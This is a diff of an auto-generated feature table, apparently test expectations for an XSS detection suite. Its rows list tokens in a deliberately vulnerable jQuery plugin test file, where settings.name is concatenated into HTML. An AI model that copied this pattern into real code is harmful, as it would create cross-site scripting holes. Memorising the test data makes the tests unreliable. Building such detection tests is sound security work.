| autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:31:60:38 | defaults | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23054,6 +152200,51 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:41:60:47 | options | enclosingFunctionName | xssPlugin | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:41:60:47 | options | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:60:41:60:47 | options | receiverName | $ | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:12:61:15 | this | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:12:61:15 | this | contextSurroundingFunctionParameters | (options) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:12:61:15 | this | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:12:61:15 | this | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:12:61:15 | this | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:12:61:20 | this.each | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:12:61:20 | this.each | contextSurroundingFunctionParameters | (options) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:12:61:20 | this.each | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:12:61:20 | this.each | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:12:61:20 | this.each | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:12:63:6 | exceptional return of this.ea ... \\n }) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:12:63:6 | exceptional return of this.ea ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:12:63:6 | exceptional return of this.ea ... \\n }) | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:12:63:6 | exceptional return of this.ea ... \\n }) | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:12:63:6 | exceptional return of this.ea ... \\n }) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:12:63:6 | this.ea ... \\n }) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:12:63:6 | this.ea ... \\n }) | contextSurroundingFunctionParameters | (options) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:12:63:6 | this.ea ... \\n }) | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:12:63:6 | this.ea ... \\n }) | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:12:63:6 | this.ea ... \\n }) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:17:61:20 | each | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:17:61:20 | each | contextSurroundingFunctionParameters | (options) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:17:61:20 | each | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:17:61:20 | each | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:17:61:20 | each | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:61:21 | settings | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:61:21 | settings | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:61:21 | settings | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:61:21 | settings | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:61:21 | settings | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:61:21 | this | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:61:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:61:21 | this | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:61:21 | this | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:61:21 | this | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:63:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:63:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:63:5 | 'arguments' object of anonymous function | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:63:5 | 'arguments' object of anonymous function | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:63:5 | 'arguments' object of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:63:5 | exceptional return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:63:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:63:5 | exceptional return of anonymous function | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:63:5 | exceptional return of anonymous function | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:63:5 | exceptional return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:63:5 | functio ... K\\n } | CalleeFlexibleAccessPath | this.each | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:63:5 | functio ... K\\n } | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:63:5 | functio ... K\\n } | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23061,12 +152252,52 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:63:5 | functio ... K\\n } | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:63:5 | functio ... K\\n } | enclosingFunctionName | xssPlugin | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:63:5 | functio ... K\\n } | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:63:5 | return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:63:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:63:5 | return of anonymous function | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:63:5 | return of anonymous function | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:61:22:63:5 | return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:9 | $ | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:9 | $ | contextSurroundingFunctionParameters | (options)\n() | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:9 | $ | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:9 | $ | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:9 | $ | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:41 | $("" ... "") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:41 | $("" ... "") | contextSurroundingFunctionParameters | (options)\n() | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:41 | $("" ... "") | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:41 | $("" ... "") | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:41 | $("" ... "") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:41 | exceptional return of $("" ... "") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:41 | exceptional return of $("" ... "") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:41 | exceptional return of $("" ... "") | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:41 | exceptional return of $("" ... "") | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:41 | exceptional return of $("" ... "") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:50 | $("" ... ppendTo | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:50 | $("" ... ppendTo | contextSurroundingFunctionParameters | (options)\n() | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:50 | $("" ... ppendTo | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:50 | $("" ... ppendTo | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:50 | $("" ... ppendTo | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:56 | $("" ... o(this) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:56 | $("" ... o(this) | contextSurroundingFunctionParameters | (options)\n() | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:56 | $("" ... o(this) | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:56 | $("" ... o(this) | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:56 | $("" ... o(this) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:56 | exceptional return of $("" ... o(this) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:56 | exceptional return of $("" ... o(this) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:56 | exceptional return of $("" ... o(this) | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:56 | exceptional return of $("" ... o(this) | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:9:62:56 | exceptional return of $("" ... o(this) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:11:62:15 | "" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:11:62:15 | "" | contextSurroundingFunctionParameters | (options)\n() | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:11:62:15 | "" | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:11:62:15 | "" | enclosingFunctionName | xssPlugin | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:11:62:15 | "" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:11:62:15 | "" | stringConcatenatedWith | -endpoint- settings.name + '' | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:11:62:31 | "" + ... gs.name | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:11:62:31 | "" + ... gs.name | contextSurroundingFunctionParameters | (options)\n() | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:11:62:31 | "" + ... gs.name | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:11:62:31 | "" + ... gs.name | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:11:62:31 | "" + ... gs.name | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:11:62:40 | "" + ... "" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:11:62:40 | "" + ... "" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:11:62:40 | "" + ... "" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23074,18 +152305,33 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:11:62:40 | "" + ... "" | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:11:62:40 | "" + ... "" | enclosingFunctionName | xssPlugin | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:11:62:40 | "" + ... "" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:19:62:26 | settings | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:19:62:26 | settings | contextSurroundingFunctionParameters | (options)\n() | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:19:62:26 | settings | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:19:62:26 | settings | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:19:62:26 | settings | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:19:62:31 | settings.name | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:19:62:31 | settings.name | contextSurroundingFunctionParameters | (options)\n() | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:19:62:31 | settings.name | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:19:62:31 | settings.name | enclosingFunctionName | xssPlugin | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:19:62:31 | settings.name | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:19:62:31 | settings.name | stringConcatenatedWith | '' -endpoint- '' | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:28:62:31 | name | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:28:62:31 | name | contextSurroundingFunctionParameters | (options)\n() | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:28:62:31 | name | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:28:62:31 | name | enclosingFunctionName | xssPlugin | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:28:62:31 | name | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:35:62:40 | "" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:35:62:40 | "" | contextSurroundingFunctionParameters | (options)\n() | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:35:62:40 | "" | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:35:62:40 | "" | enclosingFunctionName | xssPlugin | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:35:62:40 | "" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:35:62:40 | "" | stringConcatenatedWith | '' + settings.name -endpoint- | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:43:62:50 | appendTo | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:43:62:50 | appendTo | contextSurroundingFunctionParameters | (options)\n() | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:43:62:50 | appendTo | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:43:62:50 | appendTo | enclosingFunctionName | xssPlugin | +| 